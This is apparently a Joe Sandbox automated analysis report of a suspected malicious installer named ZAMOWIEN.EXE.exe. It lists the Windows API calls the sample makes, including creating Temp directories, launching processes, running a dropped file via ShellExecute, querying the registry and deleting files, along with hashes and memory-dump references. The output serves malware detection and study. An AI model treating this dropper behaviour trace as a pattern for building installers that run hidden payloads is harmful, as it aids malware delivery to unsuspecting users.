                                                            • Opcode ID: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                                            • Instruction ID: 6329997bd1e730a3a29e667b1e1522e50d9b382afe1a637a64c3b3c33ec2f19e
                                                            • Opcode Fuzzy Hash: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                                            • Instruction Fuzzy Hash: 28E0ECB4900209AFDB009F64DC09E6F7BBDFB00344F00CA21AD11E2150F778E9108EA9
                                                            APIs
                                                              • Part of subcall function 00405DE7: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 00405E3F
                                                              • Part of subcall function 00405DE7: CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
                                                              • Part of subcall function 00405DE7: CharNextA.USER32(?,"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 00405E51
                                                              • Part of subcall function 00405DE7: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 00405E61
                                                            • CreateDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 004030DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                            • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                                                            • API String ID: 4115351271-3049706366
                                                            • Opcode ID: 989f0d5821f87d80d940d59544e2b08c282c9559bcd769a3462913332c2d97c9
                                                            • Instruction ID: a6bfa147a109cceda54d2a74a0b449bcdc81c0a47cb146117b691cb1a8044d63
                                                            • Opcode Fuzzy Hash: 989f0d5821f87d80d940d59544e2b08c282c9559bcd769a3462913332c2d97c9
                                                            • Instruction Fuzzy Hash: 96D09222516D3061D59132263C06FCF1A4D8F8A359F41817BF50A740854A6D1A9289FE
                                                            APIs
                                                              • Part of subcall function 00404E89: lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                              • Part of subcall function 00404E89: lstrlenA.KERNEL32(00402FA6,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                              • Part of subcall function 00404E89: lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00402FA6,00402FA6,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8), ref: 00404EE5
                                                              • Part of subcall function 00404E89: SetWindowTextA.USER32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\), ref: 00404EF7
                                                              • Part of subcall function 00404E89: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                              • Part of subcall function 00404E89: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                              • Part of subcall function 00404E89: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                              • Part of subcall function 0040534C: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 00405371
                                                              • Part of subcall function 0040534C: CloseHandle.KERNEL32(?), ref: 0040537E
                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 3521207402-0
                                                            • Opcode ID: 25a4246e98645635c819ee4c1d8740bdf9350e3dc4731ada01073da3047d6d7e
                                                            • Instruction ID: f18eb7332cf5c9122d10212b54beee47d15ecdde2804cc733f54deaeffad9b38
                                                            • Opcode Fuzzy Hash: 25a4246e98645635c819ee4c1d8740bdf9350e3dc4731ada01073da3047d6d7e
                                                            • Instruction Fuzzy Hash: D2018031900118EBCF10AFA1CD859AE7B71EB00344F10817BFA01B51E1C7B95A81DF9E
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,00405CA8,00000000,00000002,?,00000002,?,?,00405CA8,80000002,Software\Microsoft\Windows\CurrentVersion,?,007A16A0,?), ref: 00405A8C
                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00405CA8,?,00405CA8), ref: 00405AAD
                                                            • RegCloseKey.KERNELBASE(?), ref: 00405ACE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                            • Instruction ID: 9c835cca2eb0aa0b02c586e78d8c0f4c8809676904daf451fb9b34ef674f496a
                                                            • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                            • Instruction Fuzzy Hash: AD015A7154020AEFDF128F64EC84AEB3FACEF18354F044536F955A6260D235E964CFA5
                                                            APIs
                                                              • Part of subcall function 00405805: GetFileAttributesA.KERNELBASE(?,?,0040541D,?,?,00000000,00405600,?,?,?,?), ref: 0040580A
                                                              • Part of subcall function 00405805: SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040581E
                                                            • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,00405600), ref: 0040542C
                                                            • DeleteFileA.KERNEL32(?,?,?,00000000,00405600), ref: 00405434
                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040544C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                            • String ID:
                                                            • API String ID: 1655745494-0
                                                            • Opcode ID: 7ce6c77110259a770026784a7bafc9becd511e2727126a845108ec838af216ef
                                                            • Instruction ID: 50574c3c0a793d880e57543bab2a7873921d7517d00327b94fd9c91dc08ced70
                                                            • Opcode Fuzzy Hash: 7ce6c77110259a770026784a7bafc9becd511e2727126a845108ec838af216ef
                                                            • Instruction Fuzzy Hash: FFE0E53150DA905AC310673089087DB2AD4DF86326F05493AF891B11D1C77848C68ABA
                                                            APIs
                                                            • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings,?), ref: 00401E1E
                                                            Strings
                                                            • C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings, xrefs: 00401E09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: ExecuteShell
                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings
                                                            • API String ID: 587946157-2378692180
                                                            • Opcode ID: 1a1bc187a83ad045d7d7710bd43da65327db99f82000a20fa13a5cf1f81c8db4
                                                            • Instruction ID: 65620240301e045641c79ca9780ea5e083df883982ed968680c53d4afc27f8c5
                                                            • Opcode Fuzzy Hash: 1a1bc187a83ad045d7d7710bd43da65327db99f82000a20fa13a5cf1f81c8db4
                                                            • Instruction Fuzzy Hash: 43F0F672B041406ACB11ABB5DD8AE6D7BA4DB41318F24093BF150F71C2D9FD88419B18
                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                                            • Instruction ID: 0ac01c35b1a0eb5cd592cd1bd468c7a0eb97994f07403c330b4f6ecb6608de49
                                                            • Opcode Fuzzy Hash: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                                            • Instruction Fuzzy Hash: 7D01F431628210ABE7194B789C04B6A3698E751359F10C23BF911F76F1D67CDC028B4D
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 00404F6B
                                                              • Part of subcall function 00403ED8: SendMessageA.USER32(00010432,00000000,00000000,00000000), ref: 00403EEA
                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 00404FB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: InitializeMessageSendUninitialize
                                                            • String ID:
                                                            • API String ID: 2896919175-0
                                                            • Opcode ID: 2b1e81a0dd4c0a0f4039bae0cfee92b1e0953e7f913a1ec474d827480a4d54f7
                                                            • Instruction ID: 9b68f28e419688f183e10d4429d756aafc3adc1e32d3def3a0bdbd4b3e4a8dd4
                                                            • Opcode Fuzzy Hash: 2b1e81a0dd4c0a0f4039bae0cfee92b1e0953e7f913a1ec474d827480a4d54f7
                                                            • Instruction Fuzzy Hash: 8EF024F35042029BE7011B58AC00B1277A4EBD4316F05843EFF04B32E2C73D9842876D
                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,80000000,00000003), ref: 0040582E
                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405850
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                                            • Instruction ID: d58f26a5a32defaeeb3d325f121af029a3aa60b04f4a5bd1c9a51958cab5ad8a
                                                            • Opcode Fuzzy Hash: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                                            • Instruction Fuzzy Hash: B8D09E31658301AFEF098F20DE16F2EBBA2EB84B01F10962CB642940E0D6715C15DB16
                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(?,?,0040541D,?,?,00000000,00405600,?,?,?,?), ref: 0040580A
                                                            • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040581E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                                            • Instruction ID: 3771f6966254d71710a4ae6656988e9437677f6c038d1dffa01ca6e46143e4f7
                                                            • Opcode Fuzzy Hash: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                                            • Instruction Fuzzy Hash: 84D0C972908120BFC6112728EE0889BBF95DB54271B018B31F969A22F0C7304C628A95
                                                            APIs
                                                            • CloseHandle.KERNEL32(FFFFFFFF,004033AE,?), ref: 00403558
                                                            Strings
                                                            • C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\, xrefs: 0040356C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\
                                                            • API String ID: 2962429428-3441564791
                                                            • Opcode ID: 589a16cc77adabca8de4aa73762697773acad4ee3cb03b9089ecdffb6a6655dc
                                                            • Instruction ID: 813c9bbdd70105a85b5d2afa0c8c8c3307dec0ff73d52811679b8073a06e7d3d
                                                            • Opcode Fuzzy Hash: 589a16cc77adabca8de4aa73762697773acad4ee3cb03b9089ecdffb6a6655dc
                                                            • Instruction Fuzzy Hash: EEC01230544600A6D1207F789D4F6453A545742336B908725B079B10F2D73C5B859569
                                                            APIs
                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402272
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
